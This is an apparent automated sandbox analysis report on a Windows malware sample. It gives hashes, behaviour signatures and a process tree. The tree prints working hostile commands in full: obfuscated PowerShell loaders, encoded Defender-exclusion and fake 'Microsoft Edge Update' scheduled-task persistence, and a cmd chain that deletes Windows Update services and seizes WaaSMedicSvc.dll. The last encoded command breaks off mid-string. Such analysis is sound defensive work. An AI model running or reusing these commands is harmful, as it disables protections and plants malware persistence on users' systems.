Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
19-01-2023 04:56
General
-
Target
tmp.exe
-
Size
4.9MB
-
MD5
e2c876ff5b1f24b59d928e595234cdef
-
SHA1
82d06b09b2a8c514929aab293242d4796d4ee39f
-
SHA256
e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244
-
SHA512
9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd
-
SSDEEP
98304:ZXMmA6BgrvHq3uwG/9SopFAVrSkgAm2K2fklNvpJtpqCutXE:ZXb0TwmFzQ5PK2fklNvpJyCut
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 18 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{26559d6a-db20-41ff-a827-50f937ea7091}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ac2a3d02-66ba-45a5-a2d1-18057f5fcde4}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGkAawBxAHcAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAGQAZwBlAFUAcABkAGEAdABlAHIAXABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBqAHoAYwBqACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "luchktlmnebwz"4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZABlACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcAawBBAGEAdwBCAHgAQQBIAGMAQQBJAHcAQQArAEEAQwBBAEEAVQB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAGcAQQBDADAAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAUQBBAEcARQBBAGQAQQBCAG8AQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAUQBBAEgASQBBAGIAdwBCAG4AQQBIAEkAQQBZAFEAQgB0AEEAQwBBAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBCAHoAQQBGAHcAQQBUAFEAQgBwAEEARwBNAEEAYwBnAEIAdgBBAEgATQBBAGIAdwBCAG0AQQBIAFEAQQBYAEEAQgBGAEEARwBRAEEAWgB3AEIAbABBAEYAVQBBAGMAQQBCAGsAQQBHAEUAQQBkAEEAQgBsAEEASABJAEEAWABBAEIATgBBAEcAawBBAFkAdwBCAHkAQQBHADgAQQBjAHcAQgB2AEEARwBZAEEAZABBAEIARgBBAEcAUQBBAFoAdwBCAGwAQQBGAFUAQQBjAEEAQgBrAEEARwBFAEEAZABBAEIAbABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwAwAEEAVgBnAEIAbABBAEgASQBBAFkAZwBBAGcAQQBGAEkAQQBkAFEAQgB1AEEARQBFAEEAYwB3AEEAZwBBAEQAdwBBAEkAdwBCAHEAQQBIAG8AQQBZAHcAQgBxAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBzAG0AYQBsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcwBmAHoAaQAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGIAdQBhAHkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAFUAcABkAGEAdABlACAAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG